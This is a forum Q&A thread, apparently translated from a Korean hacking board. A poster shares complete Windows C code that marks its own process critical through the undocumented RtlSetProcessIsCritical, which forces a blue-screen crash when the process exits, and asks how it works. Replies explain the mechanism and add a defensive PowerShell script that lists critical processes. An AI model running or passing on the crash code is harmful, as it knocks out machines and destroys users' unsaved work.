Programming

h@cking2013
Blue screen source

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_programming&no=6450


Hello.
I happened to come across some source code on the internet that brings up a blue screen.

#include <windows.h>

/* Undocumented ntdll export. Once the flag is set, the kernel bugchecks
   (CRITICAL_PROCESS_DIED) when this process terminates for any reason,
   including a normal return from main(). The caller must hold SeDebugPrivilege. */
typedef VOID (__stdcall *RtlSetProcessIsCritical_t)(
    BOOLEAN  NewValue,
    PBOOLEAN OldValue,
    BOOLEAN  IsWinlogon);

/* Enable one named privilege on the current process token.
   LPCTSTR matches SE_DEBUG_NAME and LookupPrivilegeValue in both ANSI and UNICODE builds. */
BOOL EnablePriv(LPCTSTR lpszPriv)
{
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tkprivs;
    BOOL bRet;
    ZeroMemory(&tkprivs, sizeof(tkprivs));

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;

    if (!LookupPrivilegeValue(NULL, lpszPriv, &luid)) {
        CloseHandle(hToken);
        return FALSE;
    }

    tkprivs.PrivilegeCount = 1;
    tkprivs.Privileges[0].Luid = luid;
    tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    /* AdjustTokenPrivileges returns TRUE even when the privilege is not held by
       the token at all; GetLastError() reports ERROR_NOT_ALL_ASSIGNED in that case. */
    bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL)
           && GetLastError() != ERROR_NOT_ALL_ASSIGNED;
    CloseHandle(hToken);
    return bRet;
}

/* Mark the current process as critical. */
BOOL ProtectProcess(void)
{
    HMODULE hDLL;
    RtlSetProcessIsCritical_t fSetCritical;

    hDLL = LoadLibraryA("ntdll.dll");   /* always mapped already; this just returns its base */
    if (hDLL == NULL)
        return FALSE;

    /* Without SeDebugPrivilege the call below is refused, so fail early. */
    if (!EnablePriv(SE_DEBUG_NAME))
        return FALSE;

    fSetCritical = (RtlSetProcessIsCritical_t)
        GetProcAddress(hDLL, "RtlSetProcessIsCritical");
    if (fSetCritical == NULL)
        return FALSE;

    fSetCritical(TRUE, NULL, FALSE);
    return TRUE;
}

int main(void)
{
    ProtectProcess();
    return 1;   /* the process exits while still marked critical -> the kernel bugchecks */
}

What is the principle behind it?

  Hit : 6635     Date : 2014/03/23 03:12



    
MainThread
It is obtaining the RtlSetProcessIsCritical function through the DLL file hDLL.
- RtlSetProcessIsCritical is a function for creating a critical process.
- A critical process (Critical Process) is a process that is not terminated; in other words, a process that triggers a blue screen.

If you want to learn more about GetProcAddress, refer to MSDN.
From MainThread
2014/05/24
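The check a responder wants after reading the answer above is the reverse of the posted program: which processes on a host currently carry the critical flag, since any of them turning into a "kill this process" action becomes a machine crash. The script below is an added example, not part of the original post or of anything on Hackerschool; it reads the same per-process flag that RtlSetProcessIsCritical sets, but through the documented kernel32 export IsProcessCritical (Windows 8.1 and later; on older systems the equivalent is NtQueryInformationProcess with ProcessBreakOnTermination). Assumptions: an elevated PowerShell session for full coverage, and a baseline list of processes that Windows itself marks critical, which is constructed here and should be replaced with one measured on a known-good build of the same Windows version.

```powershell
# Added example: report every process whose "critical" flag is set.
# Assumes Windows 8.1+ (IsProcessCritical) and, for complete coverage, an elevated shell.

$signature = @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool IsProcessCritical(IntPtr hProcess, out bool Critical);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@
Add-Type -MemberDefinition $signature -Name Native -Namespace CritCheck

# IsProcessCritical only needs the limited query right, which is granted even
# for protected processes such as csrss.
$PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Constructed baseline (assumption): processes Windows normally marks critical.
# Measure this on a known-good machine of the same build before relying on it.
$expectedCritical = @('smss', 'csrss', 'wininit', 'services', 'lsass')

$results = foreach ($p in Get-Process) {
    $h = [CritCheck.Native]::OpenProcess($PROCESS_QUERY_LIMITED_INFORMATION, $false, [uint32]$p.Id)
    if ($h -eq [IntPtr]::Zero) {
        # Do not skip silently: an unopenable process is a finding in itself.
        [pscustomobject]@{ Pid = $p.Id; Name = $p.ProcessName; Critical = 'access denied'; Expected = $null }
        continue
    }
    try {
        $crit = $false
        if (-not [CritCheck.Native]::IsProcessCritical($h, [ref]$crit)) {
            $crit = 'query failed'
        }
    } finally {
        [void][CritCheck.Native]::CloseHandle($h)
    }
    [pscustomobject]@{
        Pid      = $p.Id
        Name     = $p.ProcessName
        Critical = $crit
        Expected = ($expectedCritical -contains $p.ProcessName)
    }
}

# Full picture first: everything that is critical, baseline or not.
$results | Where-Object { $_.Critical -eq $true } | Sort-Object Name | Format-Table Pid, Name, Expected -AutoSize

# The actionable list: critical processes that are not in the baseline, plus
# anything that could not be queried. Treat an unexpected entry as a process to
# investigate (image path, signer, parent) rather than one to terminate, because
# terminating it is exactly what produces the CRITICAL_PROCESS_DIED bugcheck.
$results | Where-Object { ($_.Critical -eq $true -and -not $_.Expected) -or $_.Critical -is [string] } |
    Format-Table Pid, Name, Critical -AutoSize
```

The script opens each process with PROCESS_QUERY_LIMITED_INFORMATION rather than a broader right so that protected system processes can still be queried; processes that still refuse the open are listed instead of dropped, because a process you cannot even query is worth a second look on an incident host. Clearing the flag on a process you decide to remove is done the same way the posted program sets it (RtlSetProcessIsCritical with FALSE, from a caller holding SeDebugPrivilege), after which the process can be ended normally.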
h@cking2013: Thank you! 2014/07/30
김병권: A long time ago someone on NateOn told me to try bringing up a blue screen on my screen...
That brings back memories. Thanks for the good info... lol
2015/02/01
김병권: Even though it must have been a good 6 years ago, I do still remember it lol 2015/02/01
somass: Thank you 2022/09/16